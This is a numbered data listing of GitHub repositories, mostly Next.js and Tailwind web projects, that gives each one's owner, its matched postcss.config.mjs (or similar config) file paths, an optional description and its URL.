    173Storaboy11/meergeStoraboy11User001postcss.config.mjshttps://github.com/Storaboy11/meerge
    174ahmedghonim/esraaahmedghonimUser001postcss.config.mjshttps://github.com/ahmedghonim/esraa
    175vrunda310/AIA-VEGA-Frontendvrunda310User001frontend/postcss.config.mjshttps://github.com/vrunda310/AIA-VEGA-Frontend
    176emmanueldavidson96/popular_saas_product_landing_pageemmanueldavidson96User001postcss.config.mjshttps://github.com/emmanueldavidson96/popular_saas_product_landing_page
    177pratikp72/deal-Projectpratikp72User001postcss.config.mjshttps://github.com/pratikp72/deal-Project
    178Al-amin07/file_sureAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/file_sure
    179waris-ansar/finstarwaris-ansarUser001postcss.config.mjshttps://github.com/waris-ansar/finstar
    180MianHaziq/LKnight-LmsMianHaziqUser001postcss.config.mjshttps://github.com/MianHaziq/LKnight-Lms
    181pankajkhadse/TrustBasketpankajkhadseUser001postcss.config.mjshttps://github.com/pankajkhadse/TrustBasket
    182adnaan-2/content-generationadnaan-2User001postcss.config.mjshttps://github.com/adnaan-2/content-generation
    183malikjunaidhassann/seller-panelmalikjunaidhassannUser001postcss.config.mjshttps://github.com/malikjunaidhassann/seller-panel
    184mdnuruzzamannirob/your-capture-awards-dashboardmdnuruzzamannirobUser001postcss.config.mjshttps://github.com/mdnuruzzamannirob/your-capture-awards-dashboard
    185Minahil48/NY-caffineMinahil48User001postcss.config.mjsAll your cravings in one placehttps://github.com/Minahil48/NY-caffine
    186FrazKhan1/dev-team-chatFrazKhan1User001postcss.config.mjshttps://github.com/FrazKhan1/dev-team-chat
    187jrioscloud/financial-document-analyzerjrioscloudUser001frontend/postcss.config.mjshttps://github.com/jrioscloud/financial-document-analyzer
    188seemab-ahmed/rodopiseemab-ahmedUser001postcss.config.mjshttps://github.com/seemab-ahmed/rodopi
    189JudeTejada/digital-podsJudeTejadaUser001postcss.config.mjshttps://github.com/JudeTejada/digital-pods
    190msuhels/RapidProject-Pos-SystemmsuhelsUser001postcss.config.mjshttps://github.com/msuhels/RapidProject-Pos-System
    191Al-amin07/project_5_frontendAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/project_5_frontend
    192abdullah2310ishaq/afronautabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/afronaut
    193Jaskaran2701/Test-1Jaskaran2701User001postcss.config.mjshttps://github.com/Jaskaran2701/Test-1
    194Deepanshu7-bit/nugen-internsDeepanshu7-bitUser001postcss.config.mjshttps://github.com/Deepanshu7-bit/nugen-interns
    195saifullah-max/bublrsaifullah-maxUser001postcss.config.mjshttps://github.com/saifullah-max/bublr
    196Meet2054/automa8x-production-newMeet2054User001postcss.config.mjshttps://github.com/Meet2054/automa8x-production-new
    197bharatbrovitech/india-to-germanybharatbrovitechUser001postcss.config.mjshttps://github.com/bharatbrovitech/india-to-germany
    198PremShakti/PanchangCalendarPremShaktiUser001postcss.config.mjshttps://github.com/PremShakti/PanchangCalendar
    199Pa-ppy/CheckoutPa-ppyUser001postcss.config.mjshttps://github.com/Pa-ppy/Checkout
    200Atif-Hameed/als-adminAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/als-admin
    201Dawit212119/DevodemyDawit212119User001postcss.config.mjsBuild an LMS using Nextjs, React, Stripe, Mux, next app router, Prisma, Strip, Mysql, Docker, AWS Lambda, , Redux Toolkit, Tailwind CSS, Shadcn, TypeScript, Zod, aws s3,aws CloudFront,Clerk,https://github.com/Dawit212119/Devodemy
    202SouravDn-p/NextManager-YourInventoryManagerSouravDn-pUser001postcss.config.mjsNext.js Inventory Manager A full-stack Inventory Management System built with Next.js 14 App Router, Tailwind CSS, MongoDB, and Redux Toolkit (RTK Query). This app supports both social authentication via NextAuth.js (Google, GitHub) and traditional email/password login using JWT.https://github.com/SouravDn-p/NextManager-YourInventoryManager
    203ranjannkumar/Token-Vesting-AppranjannkumarUser001postcss.config.mjshttps://github.com/ranjannkumar/Token-Vesting-App
    204Usamahafiz8/fetchdetailsUsamahafiz8User001postcss.config.mjshttps://github.com/Usamahafiz8/fetchdetails
    205freelancework00700/CRM-test-taskfreelancework00700User001postcss.config.mjshttps://github.com/freelancework00700/CRM-test-task
    206ahmadraza382/APIs-integrationahmadraza382User001postcss.config.mjsGet data From Apis and just for practice and roughhttps://github.com/ahmadraza382/APIs-integration
    207akashmuhammadabrrar/Resume-builder-NextTypescriptakashmuhammadabrrarUser001postcss.config.mjshttps://github.com/akashmuhammadabrrar/Resume-builder-NextTypescript
    208abimtad/Customer-feedbackabimtadUser001postcss.config.mjshttps://github.com/abimtad/Customer-feedback
    209SanjayaPrasadRajapaksha/Blog_AppSanjayaPrasadRajapakshaUser001postcss.config.mjshttps://github.com/SanjayaPrasadRajapaksha/Blog_App
    210MunibQazi12/next-starter-templateMunibQazi12User001postcss.config.mjshttps://github.com/MunibQazi12/next-starter-template
    211PremShakti/multi-tenet-school-profile-appPremShaktiUser001postcss.config.mjshttps://github.com/PremShakti/multi-tenet-school-profile-app
    212mirzaghalib4726/committee-system-nextmirzaghalib4726User001postcss.config.mjshttps://github.com/mirzaghalib4726/committee-system-next
    213ChiraniSiriwardhana/Spirit11ChiraniSiriwardhanaUser001postcss.config.mjsA secure and user-friendly authentication systemhttps://github.com/ChiraniSiriwardhana/Spirit11
    214developerdesigner18/Frontend-Taskdeveloperdesigner18User001postcss.config.mjshttps://github.com/developerdesigner18/Frontend-Task
    215noors-code/Account-Settingsnoors-codeUser001postcss.config.mjshttps://github.com/noors-code/Account-Settings
    216finom/vovk-hello-worldfinomUser001postcss.config.mjsVovk.ts Hello World Apphttps://github.com/finom/vovk-hello-world
    217Yashpreetrana4790/Bestvocabulary_platformYashpreetrana4790User001postcss.config.mjsVocab learning websitehttps://github.com/Yashpreetrana4790/Bestvocabulary_platform
    218Atif-Hameed/unsigned-adminAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/unsigned-admin
    219saifullah-max/mandviwalla-mausersaifullah-maxUser001postcss.config.mjshttps://github.com/saifullah-max/mandviwalla-mauser
    220Navoda001/SolanaNavoda001User001postcss.config.mjshttps://github.com/Navoda001/Solana
    221wolfstudiosai/braxx-frontend-v2wolfstudiosaiUser001postcss.config.mjshttps://github.com/wolfstudiosai/braxx-frontend-v2
    222cywasay/neorecruits-cywasayUser001postcss.config.mjshttps://github.com/cywasay/neorecruits-
    223raoarafat/steelh-websiteraoarafatUser001postcss.config.mjshttps://github.com/raoarafat/steelh-website
    224Qasim-dev/stock-trackerQasim-devUser001postcss.config.mjshttps://github.com/Qasim-dev/stock-tracker
    225teresagrobecker/pensio_consortiateresagrobeckerUser001frontend/postcss.config.mjshttps://github.com/teresagrobecker/pensio_consortia
    226umarabid123/Raise-Your-Hackumarabid123User001frontend/postcss.config.mjshttps://github.com/umarabid123/Raise-Your-Hack
    227dhruvmalik007/xrpl_haks_hackathon_projectdhruvmalik007User001postcss.config.mjsXRPL hack competition submission: developing RAG agent framework for price monitoring and market making of impact certificateshttps://github.com/dhruvmalik007/xrpl_haks_hackathon_project
    228addis-ale/EGAaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/EGA
    229addis-ale/free_code_camp_task_01addis-aleUser001postcss.config.mjsFree codecamp front end libraries certification taskhttps://github.com/addis-ale/free_code_camp_task_01
    230addis-ale/gd-landing-pageaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/gd-landing-page
    231Al-amin07/purple-cat-clientAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/purple-cat-client
    232Al-amin07/apparel-trade-bdAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/apparel-trade-bd
    233Al-amin07/hyshinAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/hyshin
    234Al-amin07/web-programming-labAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/web-programming-lab
    235mdnuruzzamannirob/relo-websitemdnuruzzamannirobUser001postcss.config.mjshttps://github.com/mdnuruzzamannirob/relo-website
    236Harsimran-Nugen/assignmentHarsimran-NugenUser001postcss.config.mjshttps://github.com/Harsimran-Nugen/assignment
    237cto-varun/user-crud-design-nextjscto-varunUser001postcss.config.mjshttps://github.com/cto-varun/user-crud-design-nextjs
    238Aman-scripts/NugenEmployabilityTestAman-scriptsUser001postcss.config.mjshttps://github.com/Aman-scripts/NugenEmployabilityTest
    239akashstwt/inventory-management-majorprojectakashstwtUser001client/postcss.config.mjshttps://github.com/akashstwt/inventory-management-majorproject
    240akashstwt/TheGitcodeakashstwtUser001gitcodeweb/postcss.config.mjshttps://github.com/akashstwt/TheGitcode
    241Atif-Hameed/ALS-PanelAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/ALS-Panel
    242umarabid123/store-forgeumarabid123User001frontend/postcss.config.mjshttps://github.com/umarabid123/store-forge
    243addis-ale/discordaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/discord
    244addis-ale/hirecards-prodaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/hirecards-prod
    245addis-ale/ega_updatedaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/ega_updated
    246addis-ale/group-matchaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/group-match
    247SanjayaPrasadRajapaksha/Hotel_Booking-Admin_PanelSanjayaPrasadRajapakshaUser001postcss.config.mjshttps://github.com/SanjayaPrasadRajapaksha/Hotel_Booking-Admin_Panel
    248SanjayaPrasadRajapaksha/Todo_AppSanjayaPrasadRajapakshaUser001my-app/postcss.config.mjshttps://github.com/SanjayaPrasadRajapaksha/Todo_App
    249PremShakti/Inventory-Todo-ManagerPremShaktiUser001postcss.config.mjshttps://github.com/PremShakti/Inventory-Todo-Manager
    250fsdteam8/lowready-dashboardfsdteam8User001postcss.config.mjshttps://github.com/fsdteam8/lowready-dashboard
    251badhon252/shift-schedulerbadhon252User001postcss.config.mjsBuild to streamline the shift schedulerhttps://github.com/badhon252/shift-scheduler
    252fsdteam8/stevenar77-dashboardfsdteam8User001postcss.config.mjshttps://github.com/fsdteam8/stevenar77-dashboard
    253Atif-Hameed/unsigned-frontendAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/unsigned-frontend
    254Atif-Hameed/social-adminAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/social-admin
    255Atif-Hameed/cybentyAtif-HameedUser001postcss.config.mjshttps://github.com/Atif-Hameed/cybenty
    256anthemnandani/aianthemnandaniUser001postcss.config.mjshttps://github.com/anthemnandani/ai
    257mijanConnect/the-piegeon-hub-websitemijanConnectUser001postcss.config.mjshttps://github.com/mijanConnect/the-piegeon-hub-website
    258Button-20/juzbuildButton-20User001postcss.config.mjshttps://github.com/Button-20/juzbuild
    259HyderYash/my-progess-trackerHyderYashUser001postcss.config.mjshttps://github.com/HyderYash/my-progess-tracker
    260MohamedH1000/courseMohamedH1000User001postcss.config.mjshttps://github.com/MohamedH1000/course
    261nipun-imesh/sample-reactnipun-imeshUser001postcss.config.mjshttps://github.com/nipun-imesh/sample-react
    262sayyamButt317/ishoutsayyamButt317User001postcss.config.mjshttps://github.com/sayyamButt317/ishout
    263rvmediacorp/Headshot-Portland-OfficialrvmediacorpUser001postcss.config.mjshttps://github.com/rvmediacorp/Headshot-Portland-Official
    264Sawjal-sikder/faceAi-front-endSawjal-sikderUser001postcss.config.mjshttps://github.com/Sawjal-sikder/faceAi-front-end
    265SanjayaPrasadRajapaksha/E-CommerceSanjayaPrasadRajapakshaUser001postcss.config.mjshttps://github.com/SanjayaPrasadRajapaksha/E-Commerce
    266Rahulkumarhavit/multi-tenant-architectureRahulkumarhavitUser001postcss.config.mjshttps://github.com/Rahulkumarhavit/multi-tenant-architecture
    267Mohsin-Javed48/connectors-nextJsMohsin-Javed48User001postcss.config.mjshttps://github.com/Mohsin-Javed48/connectors-nextJs
    268Axxi3/henneryAxxi3User001postcss.config.mjshttps://github.com/Axxi3/hennery
    269UzairAhmedDahraj/clickup-nextjs-demoUzairAhmedDahrajUser001postcss.config.mjshttps://github.com/UzairAhmedDahraj/clickup-nextjs-demo
    270Mike-flowbiz/Flowbiz-backendMike-flowbizUser001postcss.config.mjsBackend API for FlowBiz – Node.js, PostgreSQL, JWT, PDF servicehttps://github.com/Mike-flowbiz/Flowbiz-backend
    271phillipshepard1/internal-re-crmphillipshepard1User001postcss.config.mjshttps://github.com/phillipshepard1/internal-re-crm
    272mahadi-zulfiker/mz-events-frontendmahadi-zulfikerUser001postcss.config.mjsA modern, responsive, and feature-rich frontend for the Events & Activities Platform, built with Next.js 14 and Tailwind CSS. This application provides a seamless experience for users to discover events, hosts to manage their listings, and admins to oversee the platform.https://github.com/mahadi-zulfiker/mz-events-frontend
    273fareed-aslam/capitalkvfareed-aslamUser001CapitalKV-AI-master/frontend/postcss.config.mjshttps://github.com/fareed-aslam/capitalkv
    274TimothyBabatu13/StampchainTimothyBabatu13User001stamp-chain/postcss.config.mjshttps://github.com/TimothyBabatu13/Stampchain
    275iamanaskhan10/my-portfolio-nextjsiamanaskhan10User001postcss.config.mjshttps://github.com/iamanaskhan10/my-portfolio-nextjs
    276MatiasCuadra98/ai-excelMatiasCuadra98User001apps/frontend/postcss.config.mjshttps://github.com/MatiasCuadra98/ai-excel
    277manuel-spec/another-portfoliomanuel-specUser001postcss.config.mjshttps://github.com/manuel-spec/another-portfolio
    278kasunwathsala/Nextjs-ProtfoliokasunwathsalaUser001postcss.config.mjsA vibrant, modern, and fully responsive portfolio website built with Next.js 14, TypeScript, and Tailwind CSS. Features stunning gradient designs, smooth animations, and a colorful UI that showcases your projects and skills in an eye-catching way.https://github.com/kasunwathsala/Nextjs-Protfolio
    279shayanwd/vts-nextjsshayanwdUser002postcss.config.mjs | eslint.config.mjshttps://github.com/shayanwd/vts-nextjs
    280JudeTejada/reactlyJudeTejadaUser001apps/web/postcss.config.mjshttps://github.com/JudeTejada/reactly
    281fyunusa/video-toolfyunusaUser001postcss.config.mjshttps://github.com/fyunusa/video-tool
    282TranDoanKhoe/VelvereTranDoanKhoeUser005src/components_bonus/my-tab/postcss.config.mjs | src/components_bonus/my-app/postcss.config.mjs | src/components_bonus/my-select/postcss.config.mjs | src/components_bonus/my-button/postcss.config.mjs | src/components_bonus/my-calendar/postcss.config.mjshttps://github.com/TranDoanKhoe/Velvere
    283cywasay/leaderscywasayUser001leaders-admin/postcss.config.mjshttps://github.com/cywasay/leaders
    284TimothyBabatu13/TokenMindTimothyBabatu13User001token-mind/postcss.config.mjsSmart AI brain for tokenshttps://github.com/TimothyBabatu13/TokenMind
    285shani-techv1/source-app-v2shani-techv1User001postcss.config.mjshttps://github.com/shani-techv1/source-app-v2
    286Mfahadk99/syssel-web-internalMfahadk99User001postcss.config.mjshttps://github.com/Mfahadk99/syssel-web-internal
    287Nathanim1919/time-lensNathanim1919User001postcss.config.mjshttps://github.com/Nathanim1919/time-lens
    288addis-ale/wetruck-shipperaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/wetruck-shipper
    289Romicha935/image-galleryRomicha935User001postcss.config.mjshttps://github.com/Romicha935/image-gallery
    290Ali-Hamas/Todo-AppAli-HamasUser001frontend/postcss.config.mjshttps://github.com/Ali-Hamas/Todo-App
    291MohamedH1000/philadelphia_universityMohamedH1000User001postcss.config.mjshttps://github.com/MohamedH1000/philadelphia_university
    292saifullah-max/surfchemsaifullah-maxUser001postcss.config.mjshttps://github.com/saifullah-max/surfchem
    293ahnaafarafee/bionic-sevenahnaafarafeeUser002postcss.config.mjs | eslint.config.mjsOfficial website of Bionic 7 - Biomedical Engineering batch 7 of Islamic Universityhttps://github.com/ahnaafarafee/bionic-seven
    294malirazaansari/Protfolio_projectmalirazaansariUser001postcss.config.mjsMy Personal Protfoliohttps://github.com/malirazaansari/Protfolio_project
    295ayanmal1k/DragoPumpayanmal1kUser001postcss.config.mjsSolana token Sitehttps://github.com/ayanmal1k/DragoPump
    296Shumaim-Naseer-Kiyani/framer_projectShumaim-Naseer-KiyaniUser001postcss.config.mjshttps://github.com/Shumaim-Naseer-Kiyani/framer_project
    297prosigns/dex-data-aggregationprosignsUser001postcss.config.mjshttps://github.com/prosigns/dex-data-aggregation
    298MrSohaibAhmed/interview-assessmentMrSohaibAhmedUser001postcss.config.mjshttps://github.com/MrSohaibAhmed/interview-assessment
    299roma2023/Snoonuroma2023User001postcss.config.mjshttps://github.com/roma2023/Snoonu
    300Mohsin-Javed48/nextjs-witd-oasisMohsin-Javed48User001postcss.config.mjshttps://github.com/Mohsin-Javed48/nextjs-witd-oasis
    301kasunwathsala/Caramel-Pudding-webkasunwathsalaUser001postcss.config.mjsA premium e-commerce platform for caramel pudding sales built with Next.js and shadcn/ui. Features a full shopping experience with product catalog, shopping cart, checkout, and responsive design. Ready for payment integration and scaling with your own database backend.https://github.com/kasunwathsala/Caramel-Pudding-web
    302mahadi-zulfiker/crmmahadi-zulfikerUser001postcss.config.mjsA full-stack, role-based Recruitment Management System designed to streamline hiring workflows for organizations and HR teams.https://github.com/mahadi-zulfiker/crm
    303humayun506034/ReviewHub-Clienthumayun506034User001postcss.config.mjshttps://github.com/humayun506034/ReviewHub-Client
    304brianonbased-dev/BaseAppShopbrianonbased-devUser001postcss.config.mjsBrian Shopify store for Base Apphttps://github.com/brianonbased-dev/BaseAppShop
    305sanjay10985/lead-generation-landing-pagesanjay10985User001postcss.config.mjshttps://github.com/sanjay10985/lead-generation-landing-page
    306Rahulkumarhavit/finance-advisorRahulkumarhavitUser001postcss.config.mjshttps://github.com/Rahulkumarhavit/finance-advisor
    307ayanmal1k/Sol-Marketayanmal1kUser001postcss.config.mjshttps://github.com/ayanmal1k/Sol-Market
    308Mohsin-Javed48/dresscode-nextjsMohsin-Javed48User001postcss.config.mjshttps://github.com/Mohsin-Javed48/dresscode-nextjs
    309Hriday-paul/anyjob-wellcomeHriday-paulUser001postcss.config.mjshttps://github.com/Hriday-paul/anyjob-wellcome
    310a-belard/rayyana-belardUser001frontend/postcss.config.mjshttps://github.com/a-belard/rayyan
    311kasunwathsala/Service-marketplacekasunwathsalaUser001navbar-vite (3)/postcss.config.mjsA comprehensive full-stack web application that connects customers with service providers across multiple categories including one-day services, contract-based work, and part-time opportunities.https://github.com/kasunwathsala/Service-marketplace
    312kasunwathsala/saloon-booking-systemkasunwathsalaUser001salon-booking-system/postcss.config.mjsA modern, responsive salon booking website built with Next.js and React. This comprehensive beauty salon management system features service listings, stylist profiles, multi-step appointment booking, customer testimonials, and contact management.https://github.com/kasunwathsala/saloon-booking-system
    313Nathanim1919/becomingNathanim1919User001postcss.config.mjshttps://github.com/Nathanim1919/becoming
    314Adithyahewage/portfolio_websiteAdithyahewageUser001postcss.config.mjshttps://github.com/Adithyahewage/portfolio_website
    315Ali-Hamas/Website-TodoAli-HamasUser001frontend/postcss.config.mjshttps://github.com/Ali-Hamas/Website-Todo
    316MohamedH1000/MersalMohamedH1000User001postcss.config.mjshttps://github.com/MohamedH1000/Mersal
    317MohamedH1000/cruiseMohamedH1000User001postcss.config.mjshttps://github.com/MohamedH1000/cruise
    318kasunwathsala/portfolio-2026kasunwathsalaUser001postcss.config.mjshttps://github.com/kasunwathsala/portfolio-2026
    319mahadi-zulfiker/SpaceZeemahadi-zulfikerUser001postcss.config.mjsLive websitehttps://github.com/mahadi-zulfiker/SpaceZee
    320mahadi-zulfiker/REPLIQ-Limited-Taskmahadi-zulfikerUser001postcss.config.mjsLive Linkhttps://github.com/mahadi-zulfiker/REPLIQ-Limited-Task
    321ahmadraza382/E-commerce-websiteahmadraza382User001postcss.config.mjshttps://github.com/ahmadraza382/E-commerce-website
    322Rahulkumarhavit/carmarket-placeRahulkumarhavitUser001postcss.config.mjshttps://github.com/Rahulkumarhavit/carmarket-place
    323Rahulkumarhavit/Nextjs-productivityRahulkumarhavitUser001postcss.config.mjshttps://github.com/Rahulkumarhavit/Nextjs-productivity
    324tanushka1726/react_nexttanushka1726User001postcss.config.mjsReader Website is a modern, responsive web application built using Next.js and TypeScript, designed to showcase and explore books with a smooth user experience. It features dynamic routing, reusable components, and is fully deployed for public access. Ideal for readers, book enthusiasts, or content platforms looking for an interactive reading.https://github.com/tanushka1726/react_next
    325Sameer447/O2_appSameer447User001postcss.config.mjshttps://github.com/Sameer447/O2_app
    326dmytro-chushko/portfolio-dev-dcdmytro-chushkoUser001postcss.config.mjshttps://github.com/dmytro-chushko/portfolio-dev-dc
    327Axxi3/ladyfoxxAxxi3User001postcss.config.mjshttps://github.com/Axxi3/ladyfoxx
    328Vladyslav0060/autopartnerVladyslav0060User001postcss.config.mjshttps://github.com/Vladyslav0060/autopartner
    329PremShakti/jewelry-kioskPremShaktiUser001postcss.config.mjshttps://github.com/PremShakti/jewelry-kiosk
    330theeurbanlegend/Hackathon-SubmissiontheeurbanlegendUser001client/postcss.config.mjshttps://github.com/theeurbanlegend/Hackathon-Submission
    331SouravDn-p/NextManager-YourInventory-ManagerSouravDn-pUser001postcss.config.mjsNext.js Inventory Manager A full-stack Inventory Management System built with Next.js 14 App Router, Tailwind CSS, MongoDB, and Redux Toolkit (RTK Query). This app supports both social authentication via NextAuth.js (Google, GitHub) and traditional email/password login using JWT.https://github.com/SouravDn-p/NextManager-YourInventory-Manager
    332abdullah2310ishaq/zeebuddyabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/zeebuddy
    333JudeTejada/project-monitoringJudeTejadaUser001postcss.config.mjshttps://github.com/JudeTejada/project-monitoring
    334salwaaliakbar/my-portfoliosalwaaliakbarUser001postcss.config.mjshttps://github.com/salwaaliakbar/my-portfolio
    335abdullah2310ishaq/companyabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/company
    336wahab3913/kalibar-manger1wahab3913User001postcss.config.mjshttps://github.com/wahab3913/kalibar-manger1
    337ninjadevhub/Flood-Risk-MapperninjadevhubUser001postcss.config.mjshttps://github.com/ninjadevhub/Flood-Risk-Mapper
    338trobits/trobits-frontendtrobitsUser001postcss.config.mjshttps://github.com/trobits/trobits-frontend
    339Shumaim-Naseer-Kiyani/ai_landing_pageShumaim-Naseer-KiyaniUser001postcss.config.mjshttps://github.com/Shumaim-Naseer-Kiyani/ai_landing_page
    340ChiraniSiriwardhana/PortfolioChiraniSiriwardhanaUser001postcss.config.mjshttps://github.com/ChiraniSiriwardhana/Portfolio
    341carrantal/frontendcarrantalUser001postcss.config.mjshttps://github.com/carrantal/frontend
    342Nathanim1919/atlasNathanim1919User001postcss.config.mjshttps://github.com/Nathanim1919/atlas
    343asadullah-kazmi/syncspaceasadullah-kazmiUser001frontend/postcss.config.mjsA real-time collaboration platform built with Next.js, WebSockets, and CRDTs (Yjs), enabling multi-user document editing with conflict-free state synchronization and low-latency updates.https://github.com/asadullah-kazmi/syncspace
    344usman-174/form-pdfusman-174User001postcss.config.mjshttps://github.com/usman-174/form-pdf
    345evenwalser/FinalPaperclipProevenwalserUser001postcss.config.mjsFor Hetal to move to Paperclip Vercelhttps://github.com/evenwalser/FinalPaperclipPro
    346huzzy12/portfoliohuzzy12User001postcss.config.mjsMy portfolio websitehttps://github.com/huzzy12/portfolio
    347Sameer447/my-appSameer447User001postcss.config.mjshttps://github.com/Sameer447/my-app
    348wahab3913/kalibarwahab3913User001postcss.config.mjshttps://github.com/wahab3913/kalibar
    349sybotstackdev/PortfoliosybotstackdevUser001postcss.config.mjshttps://github.com/sybotstackdev/Portfolio
    350NEERAJ131124/pisync-feNEERAJ131124User001postcss.config.mjshttps://github.com/NEERAJ131124/pisync-fe
    351RazaAkmal/frontend-testRazaAkmalUser001postcss.config.mjshttps://github.com/RazaAkmal/frontend-test
    352kasunwathsala/LoomistorekasunwathsalaUser001postcss.config.mjshttps://github.com/kasunwathsala/Loomistore
    353um8r/bridge-master-fypum8rUser001postcss.config.mjshttps://github.com/um8r/bridge-master-fyp
    354RathodDeven/danz-webRathodDevenUser001postcss.config.mjshttps://github.com/RathodDeven/danz-web
    355Gowreesh-VT/OnlyFoundersV2Gowreesh-VTUser001postcss.config.mjshttps://github.com/Gowreesh-VT/OnlyFoundersV2
    356garrycha/test-jobgarrychaUser001postcss.config.mjshttps://github.com/garrycha/test-job
    357wasi2320/ctk-newwasi2320User001postcss.config.mjshttps://github.com/wasi2320/ctk-new
    358sayyamButt317/hire-with-tess-frontendsayyamButt317User001postcss.config.mjshttps://github.com/sayyamButt317/hire-with-tess-frontend
    359Al-amin07/bigso_appAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/bigso_app
    360shermuhammad786/gs-hackathonshermuhammad786User001postcss.config.mjshttps://github.com/shermuhammad786/gs-hackathon
    361smit455/big_bazaar-storesmit455User001postcss.config.mjshttps://github.com/smit455/big_bazaar-store
    362jbaze/borec-basket-claudejbazeUser001postcss.config.mjshttps://github.com/jbaze/borec-basket-claude
    363Al-amin07/project-9-clientAl-amin07User003postcss.config.mjs | tailwind.config.js | eslint.config.mjshttps://github.com/Al-amin07/project-9-client
    364farihulrouf/orcx_fefarihulroufUser001postcss.config.mjshttps://github.com/farihulrouf/orcx_fe
    365wahab3913/kalibar-m2wahab3913User001postcss.config.mjshttps://github.com/wahab3913/kalibar-m2
    366finom/realtime-kanbanfinomUser001postcss.config.mjshttps://github.com/finom/realtime-kanban
    367rejoan121615/heritage-trial-overlayrejoan121615User001postcss.config.mjshttps://github.com/rejoan121615/heritage-trial-overlay
    368Ruwanima/PortfolioRuwanimaUser001postcss.config.mjshttps://github.com/Ruwanima/Portfolio
    369Lithira-Sasmitha/social_appLithira-SasmithaUser001postcss.config.mjshttps://github.com/Lithira-Sasmitha/social_app
    370coderkhalide/selorax-canvascoderkhalideUser001apps/canvas-v2/postcss.config.mjshttps://github.com/coderkhalide/selorax-canvas
    371Button-20/juzbuild-background-processorButton-20User001templates/homely/postcss.config.mjshttps://github.com/Button-20/juzbuild-background-processor
    372Muhammadfaizanjanjua109/frammerMotionMuhammadfaizanjanjua109User001postcss.config.mjshttps://github.com/Muhammadfaizanjanjua109/frammerMotion
    373AHAdd40451/task-sheetAHAdd40451User001postcss.config.mjshttps://github.com/AHAdd40451/task-sheet
    374zaheerahmad92001/pettrozaheerahmad92001User001postcss.config.mjspettro for petLovershttps://github.com/zaheerahmad92001/pettro
    375MahadA456/mahad-portfolioMahadA456User001postcss.config.mjshttps://github.com/MahadA456/mahad-portfolio
    376Joyeta-Mondal/Sparktech-Agency-assessmentJoyeta-MondalUser001postcss.config.mjshttps://github.com/Joyeta-Mondal/Sparktech-Agency-assessment
    377webprogramminghack/b3-practice-31webprogramminghackUser001postcss.config.mjshttps://github.com/webprogramminghack/b3-practice-31
    378Adithyahewage/Salon-demoAdithyahewageUser001postcss.config.mjsDemo project for a salon clienthttps://github.com/Adithyahewage/Salon-demo
    379akashstwt/eth-global-cryptowikiakashstwtUser001postcss.config.mjshttps://github.com/akashstwt/eth-global-cryptowiki
    380Gowreesh-VT/AWS-Web-DevGowreesh-VTUser001postcss.config.mjshttps://github.com/Gowreesh-VT/AWS-Web-Dev
    381dynamicdreamz1/startup-voyagerdynamicdreamz1User001postcss.config.mjshttps://github.com/dynamicdreamz1/startup-voyager
    382farhanmasood-se/live-docsfarhanmasood-seUser001postcss.config.mjshttps://github.com/farhanmasood-se/live-docs
    383dmytro-chushko/form-editordmytro-chushkoUser001postcss.config.mjsA Next.js application for building, publishing, and collecting submissions for custom forms. It includes an authenticated admin area with a drag-and-drop editor and a public-facing form experience.https://github.com/dmytro-chushko/form-editor
    384Sameer447/launchpad-incubator-backendSameer447User001postcss.config.mjshttps://github.com/Sameer447/launchpad-incubator-backend
    385SouravDn-p/Advance-HealthCare-Next-Level-of-Smarter-Better-HealthSouravDn-pUser001postcss.config.mjsAdvanced Healthcare Service || A complete all-in-one digital healthcare platform offering online consultations, secure health records, e-prescriptions, smart symptom evaluation, and personalized patient care — all from one seamless web experience.https://github.com/SouravDn-p/Advance-HealthCare-Next-Level-of-Smarter-Better-Health
    386SouravDn-p/Scribe-AI-Powered-Note-Taking-AppSouravDn-pUser001postcss.config.mjshttps://github.com/SouravDn-p/Scribe-AI-Powered-Note-Taking-App
    387SouravDn-p/multi-form-transactionSouravDn-pUser001postcss.config.mjsA Short Transaction Demo Platformhttps://github.com/SouravDn-p/multi-form-transaction
    388SouravDn-p/authjs-next-authenticationsSouravDn-pUser001postcss.config.mjshttps://github.com/SouravDn-p/authjs-next-authentications
    389abdullah2310ishaq/qudratabdullah2310ishaqUser001admin-panel/postcss.config.mjshttps://github.com/abdullah2310ishaq/qudrat
    390SouravDn-p/PathFinder---Smarter-Admissions-Simpler-BookingsSouravDn-pUser001postcss.config.mjsPathFinder – Smarter Admissions, Simpler Bookings A full-stack Next.js app for college admission bookings. Features include college search, admission forms, reviews, profile management, and JWT-based authentication.https://github.com/SouravDn-p/PathFinder---Smarter-Admissions-Simpler-Bookings
    391abdullah2310ishaq/resposive-doctor-websoteabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/resposive-doctor-websote
    392abdullah2310ishaq/ecommerce_jewellery_storeabdullah2310ishaqUser001postcss.config.mjshttps://github.com/abdullah2310ishaq/ecommerce_jewellery_store
    393Al-amin07/pioneerAl-amin07User001postcss.config.mjshttps://github.com/Al-amin07/pioneer
    394smit455/big_bazaar-adminsmit455User001postcss.config.mjshttps://github.com/smit455/big_bazaar-admin
    395smit455/Task_managersmit455User001postcss.config.mjshttps://github.com/smit455/Task_manager
    396dhruvmalik007/Stratavaultdhruvmalik007User002apps/web/postcss.config.mjs | packages/ui/postcss.config.mjsapplication for the Ethglobal Hackmoney 2026 submission: Building the Agent experience platform to invest effortlessly in Prediction marketshttps://github.com/dhruvmalik007/Stratavault
